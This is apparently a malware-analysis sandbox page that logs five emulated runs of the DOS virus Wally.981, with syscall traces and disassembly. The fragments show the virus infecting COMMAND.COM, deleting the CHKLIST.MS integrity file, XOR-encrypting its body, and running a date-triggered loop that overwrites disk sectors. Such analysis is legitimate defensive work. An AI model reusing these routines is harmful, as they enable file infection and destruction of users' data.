Sample viewer

vx.netlux.org/Virus.DOS.Wally.981

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:07:15.605833118Z 42 PC: 132d9 | Get date 0x132d9: cmp cx, 0x7ca
0x132dd: jge 0x13321
0x132df: cmp dh, 6
0x132e2: jae 0x13321
0x132e4: jmp 0x1332a
0x132e7: xor cx, cx
0x132e9: mov dx, 0x80
0x132ec: mov ax, 0x311
0x132ef: mov bx, 0xb000
0x132f2: mov es, bx
0x132f4: int 0x13
0x132f6: jae 0x132fc
0x132f8: xor ah, ah
0x132fa: int 0x13
0x132fc: inc dh
0x132fe: cmp dh, 4
0x13301: jb 0x132ef
0x13303: xor dh, dh
0x13305: inc ch
0x13307: cmp ch, 0x20
2018-12-17T23:07:15.608530198Z 44 PC: 13325 | Get time 0x13325: cmp dh, 1
0x13328: je 0x132e7
0x1332a: pop bx
0x1332b: mov ah, 0x2c
0x1332d: int 0x21
0x1332f: sub bx, 0x104
0x13333: mov word ptr [bx], cx
0x13335: mov word ptr [bx + 2], dx
0x13338: mov al, dh
0x1333a: mov dh, 0
0x1333c: mov ah, dh
0x1333e: mov dl, 2
0x13340: div dl
0x13342: cmp ah, 0
0x13345: jne 0x1334f
0x13347: mov byte ptr [0xff00], 0
0x1334c: jmp 0x13354
0x1334f: mov byte ptr [0xff00], 3
0x13354: mov ah, 0x19
0x13356: int 0x21
2018-12-17T23:07:15.610731576Z 44 PC: 1332f | Get time 0x1332f: sub bx, 0x104
0x13333: mov word ptr [bx], cx
0x13335: mov word ptr [bx + 2], dx
0x13338: mov al, dh
0x1333a: mov dh, 0
0x1333c: mov ah, dh
0x1333e: mov dl, 2
0x13340: div dl
0x13342: cmp ah, 0
0x13345: jne 0x1334f
0x13347: mov byte ptr [0xff00], 0
0x1334c: jmp 0x13354
0x1334f: mov byte ptr [0xff00], 3
0x13354: mov ah, 0x19
0x13356: int 0x21
0x13358: mov byte ptr [0xffbc], al
0x1335b: mov ah, 0x47
0x1335d: mov dh, 0
0x1335f: add al, 1
0x13361: mov dl, al
2018-12-17T23:07:15.613730163Z 25 PC: 13358 | Get default drive
2018-12-17T23:07:15.615727938Z 71 PC: 13368 | Get current directory
2018-12-17T23:07:15.620137438Z 26 PC: 13374 | Set disk transfer address
2018-12-17T23:07:15.625641514Z 14 PC: 13380 | Set default drive (Drive = 'C')
2018-12-17T23:07:15.627610987Z 59 PC: 13391 | Change current directory
2018-12-17T23:07:15.632725922Z 78 PC: 133c5 | Find first file
2018-12-17T23:07:15.640575949Z 67 PC: 13448 | Get or set file attributes
2018-12-17T23:07:15.64675261Z 67 PC: 13454 | Get or set file attributes
2018-12-17T23:07:15.991946001Z 61 PC: 1345c | Open file (Filename = 'COMMAND.COM')
2018-12-17T23:07:16.002776972Z 66 PC: 13467 | Move file pointer
2018-12-17T23:07:16.005243108Z 66 PC: 13476 | Move file pointer
2018-12-17T23:07:16.008128041Z 63 PC: 13480 | Read file or device (Read 80 bytes on handle 5)
2018-12-17T23:07:16.017962669Z 65 PC: 1360d | Delete file (Filename = 'CHKLIST.MS')
2018-12-17T23:07:16.024410379Z 66 PC: 134ea | Move file pointer
2018-12-17T23:07:16.027494577Z 66 PC: 134fb | Move file pointer
2018-12-17T23:07:16.029659617Z 63 PC: 13505 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:07:16.032903064Z 66 PC: 1350e | Move file pointer
2018-12-17T23:07:16.034820799Z 64 PC: 1352d | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:16.039905297Z 66 PC: 13536 | Move file pointer
2018-12-17T23:07:16.044117746Z 44 PC: 13557 | Get time 0x13557: add dl, dh
0x13559: add dl, cl
0x1355b: mov bx, 0x3d1
0x1355e: mov byte ptr es:[bx], dl
0x13561: mov di, 0x57
0x13564: pop cx
0x13565: sub cx, di
0x13567: sub cx, 0x104
0x1356b: xor byte ptr es:[di], dl
0x1356e: inc di
0x1356f: loop 0x1356b
0x13571: mov ax, es
0x13573: mov ds, ax
0x13575: push cs
0x13576: pop es
0x13577: pop bx
0x13578: mov ah, 0x40
0x1357a: mov cx, 0x3d2
0x1357d: xor dx, dx
0x1357f: int 0x21
2018-12-17T23:07:16.049740426Z 64 PC: 13581 | Write file or device (Write 978 bytes on handle 5)
2018-12-17T23:07:16.069883802Z 64 PC: 1358d | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:16.073479793Z 87 PC: 1359e | Get or set file date and time
2018-12-17T23:07:16.075568559Z 62 PC: 135a6 | Close file
2018-12-17T23:07:16.079394231Z 67 PC: 135b2 | Get or set file attributes
2018-12-17T23:07:16.091288039Z 65 PC: 1360d | Delete file (Filename = 'CHKLIST.MS')
2018-12-17T23:07:16.109786203Z 14 PC: 135c1 | Set default drive (Drive = 'A')
2018-12-17T23:07:16.112338902Z 59 PC: 135c8 | Change current directory
2018-12-17T23:07:16.117933869Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-17T23:07:16.124093318Z 48 PC: 12a8f | Get DOS version
2018-12-17T23:07:16.132000843Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-17T23:07:16.139968471Z 93 PC: 12afe | File sharing functions
2018-12-17T23:07:16.142272442Z 9 PC: 12a86 | Display string (String= 'Size change=03D5h/00981d. ')
2018-12-17T23:07:16.146707379Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15810,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:35.963261374Z 42 PC: 132d9 | Get date 0x132d9: cmp cx, 0x7ca
0x132dd: jge 0x13321
0x132df: cmp dh, 6
0x132e2: jae 0x13321
0x132e4: jmp 0x1332a
0x132e7: xor cx, cx
0x132e9: mov dx, 0x80
0x132ec: mov ax, 0x311
0x132ef: mov bx, 0xb000
0x132f2: mov es, bx
0x132f4: int 0x13
0x132f6: jae 0x132fc
0x132f8: xor ah, ah
0x132fa: int 0x13
0x132fc: inc dh
0x132fe: cmp dh, 4
0x13301: jb 0x132ef
0x13303: xor dh, dh
0x13305: inc ch
0x13307: cmp ch, 0x20
2018-12-25T12:44:35.96647951Z 44 PC: 1332f | Get time 0x1332f: sub bx, 0x104
0x13333: mov word ptr [bx], cx
0x13335: mov word ptr [bx + 2], dx
0x13338: mov al, dh
0x1333a: mov dh, 0
0x1333c: mov ah, dh
0x1333e: mov dl, 2
0x13340: div dl
0x13342: cmp ah, 0
0x13345: jne 0x1334f
0x13347: mov byte ptr [0xff00], 0
0x1334c: jmp 0x13354
0x1334f: mov byte ptr [0xff00], 3
0x13354: mov ah, 0x19
0x13356: int 0x21
0x13358: mov byte ptr [0xffbc], al
0x1335b: mov ah, 0x47
0x1335d: mov dh, 0
0x1335f: add al, 1
0x13361: mov dl, al
2018-12-25T12:44:35.969400638Z 25 PC: 13358 | Get default drive
2018-12-25T12:44:35.97066533Z 71 PC: 13368 | Get current directory
2018-12-25T12:44:35.973866525Z 26 PC: 13374 | Set disk transfer address
2018-12-25T12:44:35.97499701Z 14 PC: 13380 | Set default drive (Drive = 'C')
2018-12-25T12:44:35.9761465Z 59 PC: 13391 | Change current directory
2018-12-25T12:44:35.979935885Z 78 PC: 133c5 | Find first file
2018-12-25T12:44:35.985667967Z 67 PC: 13448 | Get or set file attributes
2018-12-25T12:44:35.991081328Z 67 PC: 13454 | Get or set file attributes
2018-12-25T12:44:36.331659235Z 61 PC: 1345c | Open file (Filename = 'COMMAND.COM')
2018-12-25T12:44:36.337998096Z 66 PC: 13467 | Move file pointer
2018-12-25T12:44:36.339249683Z 66 PC: 13476 | Move file pointer
2018-12-25T12:44:36.340447981Z 63 PC: 13480 | Read file or device (Read 80 bytes on handle 5)
2018-12-25T12:44:36.346781038Z 65 PC: 1360d | Delete file (Filename = 'CHKLIST.MS')
2018-12-25T12:44:36.351970521Z 66 PC: 134ea | Move file pointer
2018-12-25T12:44:36.353166867Z 66 PC: 134fb | Move file pointer
2018-12-25T12:44:36.355313148Z 63 PC: 13505 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:36.35769938Z 66 PC: 1350e | Move file pointer
2018-12-25T12:44:36.358858988Z 64 PC: 1352d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:36.361995456Z 66 PC: 13536 | Move file pointer
2018-12-25T12:44:36.36322741Z 44 PC: 13557 | Get time 0x13557: add dl, dh
0x13559: add dl, cl
0x1355b: mov bx, 0x3d1
0x1355e: mov byte ptr es:[bx], dl
0x13561: mov di, 0x57
0x13564: pop cx
0x13565: sub cx, di
0x13567: sub cx, 0x104
0x1356b: xor byte ptr es:[di], dl
0x1356e: inc di
0x1356f: loop 0x1356b
0x13571: mov ax, es
0x13573: mov ds, ax
0x13575: push cs
0x13576: pop es
0x13577: pop bx
0x13578: mov ah, 0x40
0x1357a: mov cx, 0x3d2
0x1357d: xor dx, dx
0x1357f: int 0x21
2018-12-25T12:44:36.365324481Z 64 PC: 13581 | Write file or device (Write 978 bytes on handle 5)
2018-12-25T12:44:36.376351008Z 64 PC: 1358d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:36.378953343Z 87 PC: 1359e | Get or set file date and time
2018-12-25T12:44:36.380304223Z 62 PC: 135a6 | Close file
2018-12-25T12:44:36.382417571Z 67 PC: 135b2 | Get or set file attributes
2018-12-25T12:44:36.392650839Z 65 PC: 1360d | Delete file (See above)
2018-12-25T12:44:36.398532829Z 14 PC: 135c1 | Set default drive (Drive = 'A')
2018-12-25T12:44:36.400270864Z 59 PC: 135c8 | Change current directory
2018-12-25T12:44:36.404063421Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T12:44:36.409298172Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:44:36.41133727Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:44:36.425382494Z 93 PC: 12afe | File sharing functions
2018-12-25T12:44:36.427402839Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:44:36.431782596Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15810,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:36.575209924Z 42 PC: 132d9 | Get date 0x132d9: cmp cx, 0x7ca
0x132dd: jge 0x13321
0x132df: cmp dh, 6
0x132e2: jae 0x13321
0x132e4: jmp 0x1332a
0x132e7: xor cx, cx
0x132e9: mov dx, 0x80
0x132ec: mov ax, 0x311
0x132ef: mov bx, 0xb000
0x132f2: mov es, bx
0x132f4: int 0x13
0x132f6: jae 0x132fc
0x132f8: xor ah, ah
0x132fa: int 0x13
0x132fc: inc dh
0x132fe: cmp dh, 4
0x13301: jb 0x132ef
0x13303: xor dh, dh
0x13305: inc ch
0x13307: cmp ch, 0x20
2018-12-25T12:44:36.578090272Z 44 PC: 1332f | Get time 0x1332f: sub bx, 0x104
0x13333: mov word ptr [bx], cx
0x13335: mov word ptr [bx + 2], dx
0x13338: mov al, dh
0x1333a: mov dh, 0
0x1333c: mov ah, dh
0x1333e: mov dl, 2
0x13340: div dl
0x13342: cmp ah, 0
0x13345: jne 0x1334f
0x13347: mov byte ptr [0xff00], 0
0x1334c: jmp 0x13354
0x1334f: mov byte ptr [0xff00], 3
0x13354: mov ah, 0x19
0x13356: int 0x21
0x13358: mov byte ptr [0xffbc], al
0x1335b: mov ah, 0x47
0x1335d: mov dh, 0
0x1335f: add al, 1
0x13361: mov dl, al
2018-12-25T12:44:36.580026964Z 25 PC: 13358 | Get default drive
2018-12-25T12:44:36.580929574Z 71 PC: 13368 | Get current directory
2018-12-25T12:44:36.584399791Z 26 PC: 13374 | Set disk transfer address
2018-12-25T12:44:36.58537672Z 14 PC: 13380 | Set default drive (Drive = 'C')
2018-12-25T12:44:36.586517662Z 59 PC: 13391 | Change current directory
2018-12-25T12:44:36.590842248Z 78 PC: 133c5 | Find first file
2018-12-25T12:44:36.59608585Z 67 PC: 13448 | Get or set file attributes
2018-12-25T12:44:36.60138695Z 67 PC: 13454 | Get or set file attributes
2018-12-25T12:44:37.585124486Z 61 PC: 1345c | Open file (Filename = 'COMMAND.COM')
2018-12-25T12:44:37.591632141Z 66 PC: 13467 | Move file pointer
2018-12-25T12:44:37.593347953Z 66 PC: 13476 | Move file pointer
2018-12-25T12:44:37.595839893Z 63 PC: 13480 | Read file or device (Read 80 bytes on handle 5)
2018-12-25T12:44:37.614576741Z 65 PC: 1360d | Delete file (Filename = 'CHKLIST.MS')
2018-12-25T12:44:37.620229719Z 66 PC: 134ea | Move file pointer
2018-12-25T12:44:37.621889174Z 66 PC: 134fb | Move file pointer
2018-12-25T12:44:37.624831824Z 63 PC: 13505 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:37.628841174Z 66 PC: 1350e | Move file pointer
2018-12-25T12:44:37.630307879Z 64 PC: 1352d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:37.633914952Z 66 PC: 13536 | Move file pointer
2018-12-25T12:44:37.635258484Z 44 PC: 13557 | Get time 0x13557: add dl, dh
0x13559: add dl, cl
0x1355b: mov bx, 0x3d1
0x1355e: mov byte ptr es:[bx], dl
0x13561: mov di, 0x57
0x13564: pop cx
0x13565: sub cx, di
0x13567: sub cx, 0x104
0x1356b: xor byte ptr es:[di], dl
0x1356e: inc di
0x1356f: loop 0x1356b
0x13571: mov ax, es
0x13573: mov ds, ax
0x13575: push cs
0x13576: pop es
0x13577: pop bx
0x13578: mov ah, 0x40
0x1357a: mov cx, 0x3d2
0x1357d: xor dx, dx
0x1357f: int 0x21
2018-12-25T12:44:37.637395388Z 64 PC: 13581 | Write file or device (Write 978 bytes on handle 5)
2018-12-25T12:44:37.662423092Z 64 PC: 1358d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:37.677031498Z 87 PC: 1359e | Get or set file date and time
2018-12-25T12:44:37.678589824Z 62 PC: 135a6 | Close file
2018-12-25T12:44:37.681454319Z 67 PC: 135b2 | Get or set file attributes
2018-12-25T12:44:37.69165925Z 65 PC: 1360d | Delete file (See above)
2018-12-25T12:44:37.697373812Z 14 PC: 135c1 | Set default drive (Drive = 'A')
2018-12-25T12:44:37.702530368Z 59 PC: 135c8 | Change current directory
2018-12-25T12:44:37.70680966Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T12:44:37.715617041Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:44:37.717227508Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:44:37.724926803Z 93 PC: 12afe | File sharing functions
2018-12-25T12:44:37.727839592Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:44:37.732992724Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15810,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:36.791848022Z 42 PC: 132d9 | Get date 0x132d9: cmp cx, 0x7ca
0x132dd: jge 0x13321
0x132df: cmp dh, 6
0x132e2: jae 0x13321
0x132e4: jmp 0x1332a
0x132e7: xor cx, cx
0x132e9: mov dx, 0x80
0x132ec: mov ax, 0x311
0x132ef: mov bx, 0xb000
0x132f2: mov es, bx
0x132f4: int 0x13
0x132f6: jae 0x132fc
0x132f8: xor ah, ah
0x132fa: int 0x13
0x132fc: inc dh
0x132fe: cmp dh, 4
0x13301: jb 0x132ef
0x13303: xor dh, dh
0x13305: inc ch
0x13307: cmp ch, 0x20
2018-12-25T12:44:36.795234579Z 44 PC: 1332f | Get time 0x1332f: sub bx, 0x104
0x13333: mov word ptr [bx], cx
0x13335: mov word ptr [bx + 2], dx
0x13338: mov al, dh
0x1333a: mov dh, 0
0x1333c: mov ah, dh
0x1333e: mov dl, 2
0x13340: div dl
0x13342: cmp ah, 0
0x13345: jne 0x1334f
0x13347: mov byte ptr [0xff00], 0
0x1334c: jmp 0x13354
0x1334f: mov byte ptr [0xff00], 3
0x13354: mov ah, 0x19
0x13356: int 0x21
0x13358: mov byte ptr [0xffbc], al
0x1335b: mov ah, 0x47
0x1335d: mov dh, 0
0x1335f: add al, 1
0x13361: mov dl, al
2018-12-25T12:44:36.797501394Z 25 PC: 13358 | Get default drive
2018-12-25T12:44:36.798872736Z 71 PC: 13368 | Get current directory
2018-12-25T12:44:36.802204006Z 26 PC: 13374 | Set disk transfer address
2018-12-25T12:44:36.803293028Z 14 PC: 13380 | Set default drive (Drive = 'C')
2018-12-25T12:44:36.804530648Z 59 PC: 13391 | Change current directory
2018-12-25T12:44:36.808286854Z 78 PC: 133c5 | Find first file
2018-12-25T12:44:36.813814148Z 67 PC: 13448 | Get or set file attributes
2018-12-25T12:44:36.819046783Z 67 PC: 13454 | Get or set file attributes
2018-12-25T12:44:37.580268979Z 61 PC: 1345c | Open file (Filename = 'COMMAND.COM')
2018-12-25T12:44:37.586093331Z 66 PC: 13467 | Move file pointer
2018-12-25T12:44:37.588172598Z 66 PC: 13476 | Move file pointer
2018-12-25T12:44:37.590140467Z 63 PC: 13480 | Read file or device (Read 80 bytes on handle 5)
2018-12-25T12:44:37.59820416Z 65 PC: 1360d | Delete file (Filename = 'CHKLIST.MS')
2018-12-25T12:44:37.604632556Z 66 PC: 134ea | Move file pointer
2018-12-25T12:44:37.606648076Z 66 PC: 134fb | Move file pointer
2018-12-25T12:44:37.615242035Z 63 PC: 13505 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:37.617799068Z 66 PC: 1350e | Move file pointer
2018-12-25T12:44:37.619096144Z 64 PC: 1352d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:37.622209486Z 66 PC: 13536 | Move file pointer
2018-12-25T12:44:37.623698355Z 44 PC: 13557 | Get time 0x13557: add dl, dh
0x13559: add dl, cl
0x1355b: mov bx, 0x3d1
0x1355e: mov byte ptr es:[bx], dl
0x13561: mov di, 0x57
0x13564: pop cx
0x13565: sub cx, di
0x13567: sub cx, 0x104
0x1356b: xor byte ptr es:[di], dl
0x1356e: inc di
0x1356f: loop 0x1356b
0x13571: mov ax, es
0x13573: mov ds, ax
0x13575: push cs
0x13576: pop es
0x13577: pop bx
0x13578: mov ah, 0x40
0x1357a: mov cx, 0x3d2
0x1357d: xor dx, dx
0x1357f: int 0x21
2018-12-25T12:44:37.630532591Z 64 PC: 13581 | Write file or device (Write 978 bytes on handle 5)
2018-12-25T12:44:37.652073253Z 64 PC: 1358d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:37.660002166Z 87 PC: 1359e | Get or set file date and time
2018-12-25T12:44:37.662229094Z 62 PC: 135a6 | Close file
2018-12-25T12:44:37.66526957Z 67 PC: 135b2 | Get or set file attributes
2018-12-25T12:44:37.67589975Z 65 PC: 1360d | Delete file (See above)
2018-12-25T12:44:37.682711403Z 14 PC: 135c1 | Set default drive (Drive = 'A')
2018-12-25T12:44:37.685206844Z 59 PC: 135c8 | Change current directory
2018-12-25T12:44:37.690100269Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T12:44:37.695572451Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:44:37.697929558Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:44:37.704421941Z 93 PC: 12afe | File sharing functions
2018-12-25T12:44:37.706089384Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:44:37.726214455Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15810,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:36.811771181Z 42 PC: 132d9 | Get date 0x132d9: cmp cx, 0x7ca
0x132dd: jge 0x13321
0x132df: cmp dh, 6
0x132e2: jae 0x13321
0x132e4: jmp 0x1332a
0x132e7: xor cx, cx
0x132e9: mov dx, 0x80
0x132ec: mov ax, 0x311
0x132ef: mov bx, 0xb000
0x132f2: mov es, bx
0x132f4: int 0x13
0x132f6: jae 0x132fc
0x132f8: xor ah, ah
0x132fa: int 0x13
0x132fc: inc dh
0x132fe: cmp dh, 4
0x13301: jb 0x132ef
0x13303: xor dh, dh
0x13305: inc ch
0x13307: cmp ch, 0x20
2018-12-25T12:44:36.814550894Z 44 PC: 1332f | Get time 0x1332f: sub bx, 0x104
0x13333: mov word ptr [bx], cx
0x13335: mov word ptr [bx + 2], dx
0x13338: mov al, dh
0x1333a: mov dh, 0
0x1333c: mov ah, dh
0x1333e: mov dl, 2
0x13340: div dl
0x13342: cmp ah, 0
0x13345: jne 0x1334f
0x13347: mov byte ptr [0xff00], 0
0x1334c: jmp 0x13354
0x1334f: mov byte ptr [0xff00], 3
0x13354: mov ah, 0x19
0x13356: int 0x21
0x13358: mov byte ptr [0xffbc], al
0x1335b: mov ah, 0x47
0x1335d: mov dh, 0
0x1335f: add al, 1
0x13361: mov dl, al
2018-12-25T12:44:36.816832115Z 25 PC: 13358 | Get default drive
2018-12-25T12:44:36.818090517Z 71 PC: 13368 | Get current directory
2018-12-25T12:44:36.821644686Z 26 PC: 13374 | Set disk transfer address
2018-12-25T12:44:36.82268659Z 14 PC: 13380 | Set default drive (Drive = 'C')
2018-12-25T12:44:36.823947074Z 59 PC: 13391 | Change current directory
2018-12-25T12:44:36.82765059Z 78 PC: 133c5 | Find first file
2018-12-25T12:44:36.8329263Z 67 PC: 13448 | Get or set file attributes
2018-12-25T12:44:36.836227896Z 67 PC: 13454 | Get or set file attributes
2018-12-25T12:44:37.583279143Z 61 PC: 1345c | Open file (Filename = 'COMMAND.COM')
2018-12-25T12:44:37.590423608Z 66 PC: 13467 | Move file pointer
2018-12-25T12:44:37.591724594Z 66 PC: 13476 | Move file pointer
2018-12-25T12:44:37.593143Z 63 PC: 13480 | Read file or device (Read 80 bytes on handle 5)
2018-12-25T12:44:37.600517153Z 65 PC: 1360d | Delete file (Filename = 'CHKLIST.MS')
2018-12-25T12:44:37.605730776Z 66 PC: 134ea | Move file pointer
2018-12-25T12:44:37.607187464Z 66 PC: 134fb | Move file pointer
2018-12-25T12:44:37.609258107Z 63 PC: 13505 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:37.611931442Z 66 PC: 1350e | Move file pointer
2018-12-25T12:44:37.613494009Z 64 PC: 1352d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:37.624687412Z 66 PC: 13536 | Move file pointer
2018-12-25T12:44:37.626193904Z 44 PC: 13557 | Get time 0x13557: add dl, dh
0x13559: add dl, cl
0x1355b: mov bx, 0x3d1
0x1355e: mov byte ptr es:[bx], dl
0x13561: mov di, 0x57
0x13564: pop cx
0x13565: sub cx, di
0x13567: sub cx, 0x104
0x1356b: xor byte ptr es:[di], dl
0x1356e: inc di
0x1356f: loop 0x1356b
0x13571: mov ax, es
0x13573: mov ds, ax
0x13575: push cs
0x13576: pop es
0x13577: pop bx
0x13578: mov ah, 0x40
0x1357a: mov cx, 0x3d2
0x1357d: xor dx, dx
0x1357f: int 0x21
2018-12-25T12:44:37.628789401Z 64 PC: 13581 | Write file or device (Write 978 bytes on handle 5)
2018-12-25T12:44:37.63967314Z 64 PC: 1358d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:37.642402495Z 87 PC: 1359e | Get or set file date and time
2018-12-25T12:44:37.643948451Z 62 PC: 135a6 | Close file
2018-12-25T12:44:37.64654522Z 67 PC: 135b2 | Get or set file attributes
2018-12-25T12:44:37.656571008Z 65 PC: 1360d | Delete file (See above)
2018-12-25T12:44:37.662553474Z 14 PC: 135c1 | Set default drive (Drive = 'A')
2018-12-25T12:44:37.668857735Z 59 PC: 135c8 | Change current directory
2018-12-25T12:44:37.680883622Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T12:44:37.691099938Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:44:37.696435181Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:44:37.703298056Z 93 PC: 12afe | File sharing functions
2018-12-25T12:44:37.70511714Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:44:37.714401709Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')